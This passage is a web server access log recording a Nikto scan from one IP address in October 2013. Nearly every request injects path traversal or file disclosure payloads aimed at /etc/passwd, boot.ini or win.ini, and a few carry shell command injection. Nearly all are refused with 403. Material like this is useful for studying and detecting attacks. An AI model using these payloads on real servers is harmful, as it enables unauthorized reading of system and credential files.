  951. 84.56.69.222 - - [23/Oct/2013:15:34:07 +0400] "GET /dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000552)"
  952. 84.56.69.222 - - [23/Oct/2013:15:34:08 +0400] "GET /docs/showtemp.cfm?TYPE=JPEG&FILE=c:\\boot.ini HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000554)"
  953. 84.56.69.222 - - [23/Oct/2013:15:34:08 +0400] "GET /ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000555)"
  954. 84.56.69.222 - - [23/Oct/2013:15:34:11 +0400] "GET /index.php?download=/winnt/win.ini HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000556)"
  955. 84.56.69.222 - - [23/Oct/2013:15:34:11 +0400] "GET /index.php?download=/windows/win.ini HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000557)"
  956. 84.56.69.222 - - [23/Oct/2013:15:34:11 +0400] "GET /index.php?download=/etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000558)"
  957. 84.56.69.222 - - [23/Oct/2013:15:34:12 +0400] "GET /index.php?|=../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000559)"
  958. 84.56.69.222 - - [23/Oct/2013:15:34:23 +0400] "GET /index.php?page=../../../../../../../../../../etc/passwd HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000560)"
  959. 84.56.69.222 - - [23/Oct/2013:15:34:25 +0400] "GET /index.php?page=../../../../../../../../../../boot.ini HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000561)"
  960. 84.56.69.222 - - [23/Oct/2013:15:34:25 +0400] "GET /index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000562)"
  961. 84.56.69.222 - - [23/Oct/2013:15:34:25 +0400] "GET /jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000563)"
  962. 84.56.69.222 - - [23/Oct/2013:15:34:25 +0400] "GET /jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000564)"
  963. 84.56.69.222 - - [23/Oct/2013:15:34:26 +0400] "GET /k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000565)"
  964. 84.56.69.222 - - [23/Oct/2013:15:34:26 +0400] "GET /nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000566)"
  965. 84.56.69.222 - - [23/Oct/2013:15:34:53 +0400] "GET /phprocketaddin/?page=../../../../../../../../../../boot.ini HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000568)"
  966. 84.56.69.222 - - [23/Oct/2013:15:34:54 +0400] "GET /phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000569)"
  967. 84.56.69.222 - - [23/Oct/2013:15:34:55 +0400] "GET /phpwebfilemgr/index.php?f=../../../../../../../../../etc HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000570)"
  968. 84.56.69.222 - - [23/Oct/2013:15:34:56 +0400] "GET /phptonuke.php?filnavn=/etc/passwd HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000571)"
  969. 84.56.69.222 - - [23/Oct/2013:15:34:56 +0400] "GET /put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000572)"
  970. 84.56.69.222 - - [23/Oct/2013:15:34:56 +0400] "GET /ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000573)"
  971. 84.56.69.222 - - [23/Oct/2013:15:34:56 +0400] "GET /support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000574)"
  972. 84.56.69.222 - - [23/Oct/2013:15:34:57 +0400] "GET /viewpage.php?file=/etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000575)"
  973. 84.56.69.222 - - [23/Oct/2013:15:34:57 +0400] "GET /Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000576)"
  974. 84.56.69.222 - - [23/Oct/2013:15:34:58 +0400] "GET /webMathematica/MSP?MSPStoreID=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini&MSPStoreType=image/gif HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000577)"
  975. 84.56.69.222 - - [23/Oct/2013:15:34:59 +0400] "GET /webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000578)"
  976. 84.56.69.222 - - [23/Oct/2013:15:35:00 +0400] "GET /webcgi/admin.cgi?list=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000579)"
  977. 84.56.69.222 - - [23/Oct/2013:15:35:02 +0400] "GET /scripts/admin.cgi?list=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000579)"
  978. 84.56.69.222 - - [23/Oct/2013:15:35:02 +0400] "GET /webcgi/14all.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000580)"
  979. 84.56.69.222 - - [23/Oct/2013:15:35:02 +0400] "GET /scripts/14all.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000580)"
  980. 84.56.69.222 - - [23/Oct/2013:15:35:03 +0400] "GET /webcgi/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000581)"
  981. 84.56.69.222 - - [23/Oct/2013:15:35:03 +0400] "GET /scripts/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000581)"
  982. 84.56.69.222 - - [23/Oct/2013:15:35:03 +0400] "GET /webcgi/anacondaclip.pl?template=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000582)"
  983. 84.56.69.222 - - [23/Oct/2013:15:35:04 +0400] "GET /scripts/anacondaclip.pl?template=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000582)"
  984. 84.56.69.222 - - [23/Oct/2013:15:35:04 +0400] "GET /webcgi/auktion.cgi?menue=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000583)"
  985. 84.56.69.222 - - [23/Oct/2013:15:35:04 +0400] "GET /scripts/auktion.cgi?menue=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000583)"
  986. 84.56.69.222 - - [23/Oct/2013:15:35:05 +0400] "GET /webcgi/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters= HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000584)"
  987. 84.56.69.222 - - [23/Oct/2013:15:35:05 +0400] "GET /scripts/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters= HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000584)"
  988. 84.56.69.222 - - [23/Oct/2013:15:35:06 +0400] "GET /webcgi/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000585)"
  989. 84.56.69.222 - - [23/Oct/2013:15:35:06 +0400] "GET /scripts/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000585)"
  990. 84.56.69.222 - - [23/Oct/2013:15:35:06 +0400] "GET /webcgi/bb-hist?HISTFILE=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000586)"
  991. 84.56.69.222 - - [23/Oct/2013:15:35:06 +0400] "GET /scripts/bb-hist?HISTFILE=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000586)"
  992. 84.56.69.222 - - [23/Oct/2013:15:35:07 +0400] "GET /webcgi/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000587)"
  993. 84.56.69.222 - - [23/Oct/2013:15:35:17 +0400] "GET /scripts/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000587)"
  994. 84.56.69.222 - - [23/Oct/2013:15:35:18 +0400] "GET /webcgi/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000588)"
  995. 84.56.69.222 - - [23/Oct/2013:15:35:18 +0400] "GET /scripts/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000588)"
  996. 84.56.69.222 - - [23/Oct/2013:15:35:18 +0400] "GET /webcgi/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000589)"
  997. 84.56.69.222 - - [23/Oct/2013:15:35:18 +0400] "GET /scripts/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000589)"
  998. 84.56.69.222 - - [23/Oct/2013:15:35:18 +0400] "GET /webcgi/cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000590)"
  999. 84.56.69.222 - - [23/Oct/2013:15:35:19 +0400] "GET /scripts/cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000590)"
  1000. 84.56.69.222 - - [23/Oct/2013:15:35:19 +0400] "GET /webcgi/cal_make.pl?p0=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000591)"
  1001. 84.56.69.222 - - [23/Oct/2013:15:35:32 +0400] "GET /scripts/cal_make.pl?p0=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000591)"
  1002. 84.56.69.222 - - [23/Oct/2013:15:35:33 +0400] "GET /webcgi/db4web_c/dbdirname//etc/passwd HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000592)"
  1003. 84.56.69.222 - - [23/Oct/2013:15:35:34 +0400] "GET /scripts/db4web_c/dbdirname//etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000592)"
  1004. 84.56.69.222 - - [23/Oct/2013:15:35:34 +0400] "GET /webcgi/db4web_c/dbdirNikto//etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000592)"
  1005. 84.56.69.222 - - [23/Oct/2013:15:35:34 +0400] "GET /scripts/db4web_c/dbdirNikto//etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000592)"
  1006. 84.56.69.222 - - [23/Oct/2013:15:36:02 +0400] "GET /scripts/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000593)"
  1007. 84.56.69.222 - - [23/Oct/2013:15:36:02 +0400] "GET /webcgi/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000594)"
  1008. 84.56.69.222 - - [23/Oct/2013:15:36:02 +0400] "GET /scripts/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000594)"
  1009. 84.56.69.222 - - [23/Oct/2013:15:36:02 +0400] "GET /webcgi/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000595)"
  1010. 84.56.69.222 - - [23/Oct/2013:15:36:03 +0400] "GET /scripts/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000595)"
  1011. 84.56.69.222 - - [23/Oct/2013:15:36:03 +0400] "GET /webcgi/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000596)"
  1012. 84.56.69.222 - - [23/Oct/2013:15:36:03 +0400] "GET /scripts/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000596)"
  1013. 84.56.69.222 - - [23/Oct/2013:15:36:03 +0400] "GET /webcgi/faxsurvey?cat%20/etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000597)"
  1014. 84.56.69.222 - - [23/Oct/2013:15:36:04 +0400] "GET /scripts/faxsurvey?cat%20/etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000597)"
  1015. 84.56.69.222 - - [23/Oct/2013:15:36:04 +0400] "GET /webcgi/faqmanager.cgi?toc=/etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000598)"
  1016. 84.56.69.222 - - [23/Oct/2013:15:36:04 +0400] "GET /scripts/faqmanager.cgi?toc=/etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000598)"
  1017. 84.56.69.222 - - [23/Oct/2013:15:36:04 +0400] "GET /webcgi/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000599)"
  1018. 84.56.69.222 - - [23/Oct/2013:15:36:05 +0400] "GET /scripts/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000599)"
  1019. 84.56.69.222 - - [23/Oct/2013:15:36:05 +0400] "GET /webcgi/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000602)"
  1020. 84.56.69.222 - - [23/Oct/2013:15:36:05 +0400] "GET /scripts/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000602)"
  1021. 84.56.69.222 - - [23/Oct/2013:15:36:06 +0400] "GET /webcgi/generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000603)"
  1022. 84.56.69.222 - - [23/Oct/2013:15:36:06 +0400] "GET /scripts/generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000603)"
  1023. 84.56.69.222 - - [23/Oct/2013:15:36:06 +0400] "GET /webcgi/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000604)"
  1024. 84.56.69.222 - - [23/Oct/2013:15:36:06 +0400] "GET /scripts/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000604)"
  1025. 84.56.69.222 - - [23/Oct/2013:15:36:07 +0400] "GET /webcgi/htmlscript?../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000605)"
  1026. 84.56.69.222 - - [23/Oct/2013:15:36:07 +0400] "GET /scripts/htmlscript?../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000605)"
  1027. 84.56.69.222 - - [23/Oct/2013:15:36:08 +0400] "GET /webcgi/htgrep?file=index.html&hdr=/etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000606)"
  1028. 84.56.69.222 - - [23/Oct/2013:15:36:08 +0400] "GET /scripts/htgrep?file=index.html&hdr=/etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000606)"
  1029. 84.56.69.222 - - [23/Oct/2013:15:36:09 +0400] "GET /webcgi/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000607)"
  1030. 84.56.69.222 - - [23/Oct/2013:15:36:09 +0400] "GET /scripts/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000607)"
  1031. 84.56.69.222 - - [23/Oct/2013:15:36:09 +0400] "GET /webcgi/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000608)"
  1032. 84.56.69.222 - - [23/Oct/2013:15:36:10 +0400] "GET /scripts/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000608)"
  1033. 84.56.69.222 - - [23/Oct/2013:15:36:10 +0400] "GET /webcgi/sbcgi/sitebuilder.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000609)"
  1034. 84.56.69.222 - - [23/Oct/2013:15:36:25 +0400] "GET /scripts/sbcgi/sitebuilder.cgi HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000609)"
  1035. 84.56.69.222 - - [23/Oct/2013:15:36:26 +0400] "GET /webcgi/mrtg.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000610)"
  1036. 84.56.69.222 - - [23/Oct/2013:15:36:26 +0400] "GET /scripts/mrtg.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000610)"
  1037. 84.56.69.222 - - [23/Oct/2013:15:36:56 +0400] "GET /scripts/mrtg.cfg?cfg=../../../../../../../../etc/passwd HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000611)"
  1038. 84.56.69.222 - - [23/Oct/2013:15:36:56 +0400] "GET /webcgi/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000612)"
  1039. 84.56.69.222 - - [23/Oct/2013:15:36:57 +0400] "GET /scripts/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000612)"
  1040. 84.56.69.222 - - [23/Oct/2013:15:36:59 +0400] "GET /webcgi/main.cgi?board=FREE_BOARD&command=down_load&fileNikto=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000612)"
  1041. 84.56.69.222 - - [23/Oct/2013:15:36:59 +0400] "GET /scripts/main.cgi?board=FREE_BOARD&command=down_load&fileNikto=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000612)"
  1042. 84.56.69.222 - - [23/Oct/2013:15:36:59 +0400] "GET /webcgi/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000613)"
  1043. 84.56.69.222 - - [23/Oct/2013:15:36:59 +0400] "GET /scripts/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000613)"
  1044. 84.56.69.222 - - [23/Oct/2013:15:37:00 +0400] "GET /webcgi/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000614)"
  1045. 84.56.69.222 - - [23/Oct/2013:15:37:00 +0400] "GET /scripts/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000614)"
  1046. 84.56.69.222 - - [23/Oct/2013:15:37:00 +0400] "GET /webcgi/loadpage.cgi?user_id=1&file=..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\winnt\\\\win.ini HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000615)"
  1047. 84.56.69.222 - - [23/Oct/2013:15:37:12 +0400] "GET /scripts/loadpage.cgi?user_id=1&file=..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\winnt\\\\win.ini HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000615)"
  1048. 84.56.69.222 - - [23/Oct/2013:15:37:12 +0400] "GET /webcgi/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000616)"
  1049. 84.56.69.222 - - [23/Oct/2013:15:37:12 +0400] "GET /scripts/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000616)"
  1050. 84.56.69.222 - - [23/Oct/2013:15:37:19 +0400] "GET /webcgi/htsearch?exclude=%60/etc/passwd%60 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000617)"
  1051. 84.56.69.222 - - [23/Oct/2013:15:37:20 +0400] "GET /scripts/htsearch?exclude=%60/etc/passwd%60 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000617)"
  1052. 84.56.69.222 - - [23/Oct/2013:15:37:20 +0400] "GET /webcgi/shop.cgi?page=../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000618)"
  1053. 84.56.69.222 - - [23/Oct/2013:15:37:20 +0400] "GET /scripts/shop.cgi?page=../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000618)"
  1054. 84.56.69.222 - - [23/Oct/2013:15:37:20 +0400] "GET /webcgi/sendtemp.pl?templ=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000619)"
  1055. 84.56.69.222 - - [23/Oct/2013:15:37:21 +0400] "GET /scripts/sendtemp.pl?templ=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000619)"
  1056. 84.56.69.222 - - [23/Oct/2013:15:37:21 +0400] "GET /webcgi/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000620)"
  1057. 84.56.69.222 - - [23/Oct/2013:15:37:21 +0400] "GET /scripts/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000620)"
  1058. 84.56.69.222 - - [23/Oct/2013:15:37:21 +0400] "GET /webcgi/search.pl?form=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000621)"
  1059. 84.56.69.222 - - [23/Oct/2013:15:37:23 +0400] "GET /scripts/search.pl?form=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000621)"
  1060. 84.56.69.222 - - [23/Oct/2013:15:37:24 +0400] "GET /webcgi/search.cgi?..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\winnt\\\\win.ini HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000622)"
  1061. 84.56.69.222 - - [23/Oct/2013:15:37:37 +0400] "GET /scripts/search.cgi?..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\winnt\\\\win.ini HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000622)"
  1062. 84.56.69.222 - - [23/Oct/2013:15:37:38 +0400] "GET /webcgi/search.cgi?..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\windows\\\\win.ini HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000623)"
  1063. 84.56.69.222 - - [23/Oct/2013:15:37:38 +0400] "GET /scripts/search.cgi?..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\windows\\\\win.ini HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000623)"
